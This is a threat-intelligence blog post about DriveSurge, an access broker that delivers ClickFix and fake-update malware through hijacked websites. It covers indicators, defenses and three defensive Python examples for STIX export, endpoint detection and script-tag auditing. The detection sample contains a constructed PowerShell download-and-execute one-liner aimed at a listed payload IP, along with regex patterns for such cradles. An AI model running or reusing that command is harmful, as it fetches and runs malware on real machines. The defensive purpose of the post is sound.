
SilentPush Named DriveSurge Yesterday. We Had Their Infrastructure Since February.

  • Writer: Patrick Duggan

On June 2, SilentPush named a new threat actor: DriveSurge, an initial access broker operating on a pay-per-install model. DriveSurge compromises thousands of legitimate websites and uses them to deliver ClickFix and FakeUpdates campaigns to profiled victims, then sells the resulting access (infected machines with valid credentials) to downstream ransomware groups, wire fraud operators, and identity thieves.


We had been indexing their infrastructure since February. Here is the receipt, then the explanation.




Before DriveSurge was a named actor, our corpus already held the ClickFix and ClearFake ecosystem it operates in. On May 1, our PreCog system caught the Apothecary DXNP2C7 campaign, a ClearFake distribution rebuild across 32 parent domains and 184 subdomains, before the distribution wave began. On May 30, WithSecure's GREYVIBE and PhantomClick campaign landed in our index: the fake Zoom and CAPTCHA lure domains, the hosting IPs, and the lure document hashes. In February, staging-subdomain C2 nodes flagged as ClickFix botnet infrastructure showed up in our feeds at BDE score 85, the automated score that runs continuously across our 17.9 million document corpus.


DriveSurge was not a name then. It is a name now. The infrastructure was the same.




Here is what DriveSurge is, explained plainly.


Imagine a parking lot attendant who does not rob you directly. They just direct your car into a dark corner where someone else is waiting. DriveSurge is that attendant. They break into thousands of legitimate, high-reputation websites — local news sites, legal firms, trade services, any site running an unpatched CMS — and hide a tiny script on each page. When you visit, the script silently evaluates you. If you look valuable — real human, enterprise operating system, the right language, not a known security researcher IP — you get redirected to a fake warning page designed to trick you into running a command or downloading a file. Your infected machine is then listed for sale on the dark web.


The script does nothing for bots, for known researcher IPs, for machines that have already been infected, or for visitors who do not match the buyer's target profile. This is why most people who visit a DriveSurge-compromised site never see anything unusual. The attack is invisible to everyone it cannot monetize.




The two delivery methods are ClickFix and FakeUpdates.


ClickFix shows you a fake CAPTCHA or browser error on the compromised website. It tells you to press Win and R together, which opens the Windows Run dialog, and then to paste a command that the page has already placed on your clipboard (typically at the moment you click the fake verification button). The command downloads and runs malware. You did the attacker's work for them: no exploit was needed, no browser alert fires, and the interface looks like an ordinary website glitch until it is too late.


FakeUpdates is simpler. It shows you a convincing popup saying your browser needs an immediate update to continue. The "update" is malware: on Windows an executable, on macOS a disk image or package file served from the payload servers at 46.226.166.57 and 147.45.42.200. After installation, the C2 server at 147.45.42.205 on port 8133 controls the infected machine.


The traffic distribution system behind both methods is zTDS, open source software, version 1.0.3, from ztds.info. DriveSurge is using the same kind of routing technology that advertising networks use to send visitors to different destinations by profile. The difference is what gets distributed.




The infrastructure we are now holding, as of June 3, covers the full IOC set from SilentPush's report.


The inject and beacon domains include beacontrace.bond, webgleam.info, newtdsone.shop, captioto.com, and banerpanel.live. A pre-staged cluster of seven .icu domains — brightson.icu, coverlink.icu, datumprobe.icu, eraggifts.icu, keyview.icu, traceglimpse.icu, and tracekey.icu — represents infrastructure staged but not yet fully weaponized at time of reporting.


The payload and C2 IPs: 91.92.240.127 as the ClickFix code source, 46.226.166.57 and 147.45.42.200 as the macOS payload servers, and 147.45.42.205 port 8133 as the macOS C2. The macOS C2 IP has been active since at least September 13, 2025 according to SilentPush's infrastructure tracking.



All of these are now in our STIX feed.
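For readers who want to see what those feed entries look like, here is an added example, not the feed's own code and not SilentPush's. It turns the IOCs listed above into a STIX 2.1 bundle using only the Python standard library (no stix2 package). The STIX ids and timestamps are generated at run time, and the label strings and indicator names are editorial choices; the observables themselves are exactly the ones the post lists.

```python
"""Build a STIX 2.1 indicator bundle from the DriveSurge IOCs in the post.

Added example for this post; not the feed's own code. Labels, names and the
id/timestamp generation are assumptions; the observables are from the post.
"""
import json
import uuid
from datetime import datetime, timezone

# IOCs as listed in the post, grouped by the role the post gives them.
INJECT_DOMAINS = ["beacontrace.bond", "webgleam.info", "newtdsone.shop",
                  "captioto.com", "banerpanel.live"]
STAGED_DOMAINS = ["brightson.icu", "coverlink.icu", "datumprobe.icu",
                  "eraggifts.icu", "keyview.icu", "traceglimpse.icu", "tracekey.icu"]
PAYLOAD_IPS = {"91.92.240.127": "ClickFix code source",
               "46.226.166.57": "macOS payload server",
               "147.45.42.200": "macOS payload server"}
C2_IP, C2_PORT = "147.45.42.205", 8133


def stix_pattern(kind, value, port=None):
    """Return a STIX 2.1 pattern expression for one observable."""
    if kind == "domain":
        return f"[domain-name:value = '{value}']"
    if kind == "ipv4" and port is None:
        return f"[ipv4-addr:value = '{value}']"
    if kind == "ipv4":
        # Bind address and port in one observation so the indicator matches
        # the C2 socket specifically, not every packet to that host.
        return ("[network-traffic:dst_ref.type = 'ipv4-addr' AND "
                f"network-traffic:dst_ref.value = '{value}' AND "
                f"network-traffic:dst_port = {port}]")
    raise ValueError(f"unsupported observable kind: {kind}")


def indicator(pattern, name, labels, now):
    """One STIX 2.1 Indicator SDO (required fields plus name and labels)."""
    return {
        "type": "indicator",
        "spec_version": "2.1",
        "id": f"indicator--{uuid.uuid4()}",
        "created": now,
        "modified": now,
        "name": name,
        "indicator_types": ["malicious-activity"],
        "pattern": pattern,
        "pattern_type": "stix",
        "pattern_version": "2.1",
        "valid_from": now,
        "labels": labels,
    }


def build_bundle(now=None):
    """Assemble every IOC from the post into a single STIX 2.1 bundle."""
    if now is None:  # STIX wants UTC with a trailing Z
        now = (datetime.now(timezone.utc).isoformat(timespec="milliseconds")
               .replace("+00:00", "Z"))
    objs = []
    for d in INJECT_DOMAINS:
        objs.append(indicator(stix_pattern("domain", d),
                              f"DriveSurge inject/beacon domain {d}",
                              ["drivesurge", "clickfix", "fakeupdates"], now))
    for d in STAGED_DOMAINS:
        objs.append(indicator(stix_pattern("domain", d),
                              f"DriveSurge pre-staged domain {d}",
                              ["drivesurge", "staged"], now))
    for ip, role in PAYLOAD_IPS.items():
        objs.append(indicator(stix_pattern("ipv4", ip),
                              f"DriveSurge {role} {ip}",
                              ["drivesurge", "payload"], now))
    objs.append(indicator(stix_pattern("ipv4", C2_IP, C2_PORT),
                          f"DriveSurge macOS C2 {C2_IP}:{C2_PORT}",
                          ["drivesurge", "c2", "macos"], now))
    return {"type": "bundle", "id": f"bundle--{uuid.uuid4()}", "objects": objs}


if __name__ == "__main__":
    print(json.dumps(build_bundle(), indent=2))
```

The one design choice worth noting: the C2 is expressed as a network-traffic pattern on address and port together, while the payload servers are plain ipv4-addr patterns. That mirrors the post's own distinction: traffic to 147.45.42.205:8133 is the specific signal, whereas the payload hosts are worth blocking on any port.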




The defense side is straightforward once you understand the two lures.


No legitimate browser update ever requires you to press Win and R. No CAPTCHA ever requires you to paste a command into your operating system. If a website asks you to do either of those things, you are looking at a ClickFix attack. Close the tab. The website is not trying to help you — it has been compromised by someone who wants to use your machine.


For organizations: block the listed domains at your DNS resolver and the payload and C2 IP addresses at your perimeter, restrict what standard users can launch from the Run dialog (for example, the Group Policy setting "Remove Run menu from Start Menu" under User Configuration > Administrative Templates > Start Menu and Taskbar, which also disables Win+R, or AppLocker/WDAC rules that keep PowerShell and cmd.exe away from non-administrative users), and alert on outbound connections to 147.45.42.205 on port 8133. Because Win+R hands the pasted command to explorer.exe, a ClickFix execution shows up in process telemetry as explorer.exe spawning PowerShell with a hidden-window, download-and-execute one-liner; that is the host-side signal to pair with the network one. Treat any connection to 147.45.42.205:8133 from your estate as a macOS infection to contain now, not a lead to triage later; the only caveat is that IP indicators age, so confirm with host evidence before closing the case.
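As an added example (not from the post or from SilentPush), here is the detection logic those two controls imply, run over a handful of constructed endpoint events. The records are Sysmon-shaped JSON (event ID 1 for process creation with Image, ParentImage and CommandLine; event ID 3 for network connections with DestinationIp and DestinationPort), but the hostnames, command lines and the URL path in the sample are made up for this example; the IPs and port are the ones the post lists.

```python
"""Endpoint detection for DriveSurge ClickFix execution and C2/payload traffic.

Added example for this post, not vendor code. Event shape mirrors Sysmon field
names; the sample events below are constructed, the IOCs are from the post.
"""
import json
import re

PAYLOAD_IPS = {"91.92.240.127", "46.226.166.57", "147.45.42.200"}
C2_IP, C2_PORT = "147.45.42.205", 8133

# Interpreters a ClickFix paste lands in. The Run dialog is owned by
# explorer.exe, so the parent of the interpreter is explorer.exe.
INTERPRETERS = ("powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe")
# Tokens typical of a one-liner that fetches and runs a second stage.
SUSPICIOUS = re.compile(
    r"(-w(indowstyle)?\s+hidden|-enc(odedcommand)?\b|\biex\b|invoke-expression|"
    r"\birm\b|invoke-webrequest|downloadstring|https?://)",
    re.IGNORECASE,
)


def detect(events):
    """Return (severity, rule, detail) tuples for events matching the rules."""
    alerts = []
    for ev in events:
        if ev.get("EventID") == 1:  # process creation
            image = ev.get("Image", "").lower()
            parent = ev.get("ParentImage", "").lower()
            cmd = ev.get("CommandLine", "")
            if image.endswith(INTERPRETERS) and parent.endswith("explorer.exe"):
                hits = sorted({m.group(0).lower() for m in SUSPICIOUS.finditer(cmd)})
                # Require two tokens: "-File backup.ps1" from the Run box is
                # not a ClickFix paste, "-w hidden ... iex (irm http...)" is.
                if len(hits) >= 2:
                    alerts.append(("high", "clickfix_run_dialog",
                                   f"{ev['Computer']}: {cmd} tokens={hits}"))
        elif ev.get("EventID") == 3:  # network connection
            ip = ev.get("DestinationIp")
            port = int(ev.get("DestinationPort", 0))
            if ip == C2_IP and port == C2_PORT:
                alerts.append(("critical", "drivesurge_macos_c2",
                               f"{ev['Computer']} -> {ip}:{port}"))
            elif ip == C2_IP:
                # Same host, other port: worth a look, but not the post's
                # confirmed-infection signal, so lower severity.
                alerts.append(("medium", "drivesurge_c2_ip_other_port",
                               f"{ev['Computer']} -> {ip}:{port}"))
            elif ip in PAYLOAD_IPS:
                alerts.append(("high", "drivesurge_payload_server",
                               f"{ev['Computer']} -> {ip}:{port}"))
    return alerts


# Constructed sample telemetry (hostnames, paths and the verify.txt URL path are
# invented; 203.0.113.10 is documentation space). One ClickFix paste, one
# benign PowerShell launch, one non-explorer child, one C2 hit, one payload
# fetch and one unrelated connection.
SAMPLE_EVENTS = [json.loads(line) for line in r"""
{"EventID": 1, "Computer": "WS-0412", "ParentImage": "C:\\Windows\\explorer.exe", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "CommandLine": "powershell -w hidden -c \"iex (irm https://91.92.240.127/verify.txt)\""}
{"EventID": 1, "Computer": "WS-0412", "ParentImage": "C:\\Windows\\explorer.exe", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "CommandLine": "powershell -NoProfile -File C:\\scripts\\backup.ps1"}
{"EventID": 1, "Computer": "WS-0777", "ParentImage": "C:\\Program Files\\Microsoft VS Code\\Code.exe", "Image": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "cmd /c curl https://example.org/a.txt"}
{"EventID": 3, "Computer": "MBP-0091", "DestinationIp": "147.45.42.205", "DestinationPort": "8133"}
{"EventID": 3, "Computer": "WS-0412", "DestinationIp": "91.92.240.127", "DestinationPort": "443"}
{"EventID": 3, "Computer": "WS-0555", "DestinationIp": "203.0.113.10", "DestinationPort": "443"}
""".strip().splitlines()]


if __name__ == "__main__":
    for severity, rule, detail in detect(SAMPLE_EVENTS):
        print(severity.upper(), rule, detail)
```

The process rule deliberately keys on the parent being explorer.exe rather than on PowerShell alone, because PowerShell under a terminal, a scheduled task or an RMM agent is normal in most estates; PowerShell with a hidden window and a download cradle launched straight from the shell is what a Win+R paste looks like.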


For website owners: the compromise usually comes through unpatched WordPress plugins or other CMS vulnerabilities. Compare the script tags on your live pages against a known-good baseline, and look for ones you did not put there, both in theme and plugin files and in database-stored content. Update core, themes, and plugins, and remove what you do not use. The compromised sites themselves are not the target of DriveSurge; they are the delivery mechanism. Your visitors are the product.
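The audit described above, as an added example that is not part of the post: a small script-tag auditor using only the Python standard library. It collects every script on a page, flags external sources that are not on an allowlist, flags sources on the inject domains the post names, and flags inline scripts carrying obfuscation markers. The sample page and the allowlist hosts (a made-up first-party host plus two common CDNs) are constructed for this example; you would substitute your own.

```python
"""Audit a page's <script> tags for injected code.

Added example for this post, not the post's or any vendor's code. The sample
HTML and the allowlist are constructed; the KNOWN_BAD domains are from the post.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumption: hosts you expect to serve script on your site (replace with yours).
ALLOWED_HOSTS = {"www.example-news.test", "cdnjs.cloudflare.com",
                 "www.googletagmanager.com"}
# Inject/beacon domains the post lists for DriveSurge.
KNOWN_BAD = {"beacontrace.bond", "webgleam.info", "newtdsone.shop",
             "captioto.com", "banerpanel.live"}
# Markers common in injected loaders: eval/atob/fromCharCode and long base64 runs.
OBFUSCATION = re.compile(
    r"(\beval\(|\batob\(|String\.fromCharCode|unescape\(|[A-Za-z0-9+/]{80,}={0,2})")


class ScriptCollector(HTMLParser):
    """Collect (src, inline_body, line_number) for every <script> element."""

    def __init__(self):
        super().__init__()
        self.scripts = []
        self._cur = None

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._cur = [dict(attrs).get("src"), "", self.getpos()[0]]

    def handle_data(self, data):
        if self._cur is not None:  # HTMLParser hands script bodies to handle_data
            self._cur[1] += data

    def handle_endtag(self, tag):
        if tag == "script" and self._cur is not None:
            self.scripts.append(tuple(self._cur))
            self._cur = None


def host_of(src):
    """Host of an absolute or protocol-relative URL; '' for first-party relative paths."""
    if src.startswith("//"):
        src = "https:" + src
    return (urlparse(src).hostname or "") if "://" in src else ""


def audit(html, allowed_hosts=ALLOWED_HOSTS):
    """Return (severity, line, message) findings for suspicious script tags."""
    parser = ScriptCollector()
    parser.feed(html)
    findings = []
    for src, body, line in parser.scripts:
        if src:
            host = host_of(src)
            if host in KNOWN_BAD:
                findings.append(("critical", line,
                                 f"script src on known DriveSurge domain: {src}"))
            elif host and host not in allowed_hosts:
                findings.append(("high", line,
                                 f"script src on unrecognized host: {src}"))
        elif OBFUSCATION.search(body):
            findings.append(("high", line, "inline script with obfuscation markers"))
    return findings


# Constructed sample page: two legitimate scripts, one injected external
# loader on a post-listed domain, one benign inline snippet, one obfuscated inline.
SAMPLE_HTML = """<html><head>
<script src="/assets/app.js"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.7.1/jquery.min.js"></script>
<script src="https://beacontrace.bond/s.js"></script>
<script>window.dataLayer = window.dataLayer || [];</script>
<script>eval(atob("dmFyIHg9MTsgZG9jdW1lbnQud3JpdGUoeCk7"));</script>
</head><body><p>hello</p></body></html>"""


if __name__ == "__main__":
    for severity, line, message in audit(SAMPLE_HTML):
        print(f"{severity.upper():8} line {line}: {message}")
```

Run it against the HTML your server actually emits (fetch the page, do not read the theme file), because an injection planted in the database or in a plugin's output only exists in the rendered response. Diffing today's script list against a stored baseline catches new tags even when they point somewhere not yet on any blocklist.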




SilentPush named it on June 2. The infrastructure was running since at least September 2025. We were indexing the ecosystem it operates in since February.


The feed is live. The IOCs are in it. If you are running the STIX feed, you already have them.



